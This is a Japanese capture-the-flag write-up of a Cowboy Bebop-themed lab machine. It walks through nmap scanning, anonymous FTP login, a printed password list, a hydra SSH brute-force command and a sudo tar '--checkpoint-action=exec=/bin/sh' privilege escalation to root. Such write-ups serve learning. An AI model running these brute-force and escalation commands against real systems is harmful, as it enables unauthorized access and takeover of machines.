概要
Bug Bountyの基本みたいな内容かと思ったら全然違った。元ネタはカウボーイビバップ。
アメリカでも人気なんだね。
初心者向けなのか、
- Deploy the machine.
- Find open ports on the machine
とかあった(回答する必要がない問題)
Who wrote the task list?
nmapしたら21にftp, 22にssh,80にapacheのサービスが動いていたのでftpのanonymousでログイン
- task.txt
- lock.txt
というテキストがあるので、両方ダウンロードして中身を見るとtask.txtに
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
- lin
というテキストがあるので答えはlin
lock.txtの中身については
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
dRa6oN5YNDiCATE
ReDDR4g0n5ynDIc4te
R3Dr4gOn2044
RedDr4gonSynd1cat3
R3dDRaG0Nsynd1c@T3
Synd1c4teDr@g0n
reddRAg0N
REddRaG0N5yNdIc47e
Dra6oN$yndIC@t3
4L1mi6H71StHeB357
rEDdragOn$ynd1c473
DrAgoN5ynD1cATE
ReDdrag0n$ynd1cate
Dr@gOn$yND1C4Te
RedDr@gonSyn9ic47e
REd$yNdIc47e
dr@goN5YNd1c@73
rEDdrAGOnSyNDiCat3
r3ddr@g0N
ReDSynd1ca7e
ですげーパスワードっぽい。
一応apacheが動いていたのでgobusterを動かしてみるが、特におかしなurlは見つからなかったため今回はこれらの組み合わせでsshで侵入するとあたりをつける
ちなみにテキストの中身についてはアニメにredmoonという薬物が出てきたのでその話にかけているだけで、今回のCTFとは別に関係なさそう。
What service can you bruteforce with the text file found?
上記書いたが、sshでのパスワード総当たりかなとあたりをつけているので答えはssh
What is the users password?
HintにUse Hydraとあるのでlinとあと一応locks.txtとあるのでlocksをユーザー名に渡してhydraで総あたり攻撃をする
hydra -L userlit.txt -P locks.txt IP ssh
そうするとlinユーザーでパスワードがヒットする
linユーザーのホームディレクトリにuser.txtがあるのでそこに一つ目のフラグが見つかる
root取得(権限昇格)
sudo -l
を実行するとtarにsudo権限がありそうなのでGTFOBinsで調べると
https://gtfobins.github.io/gtfobins/tar/#sudo
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
なんでtarに任意のコマンドがオプションがあるんですかね?
これで権限昇格することができるのであとは/root/root.txt内にフラグを見つけることができる。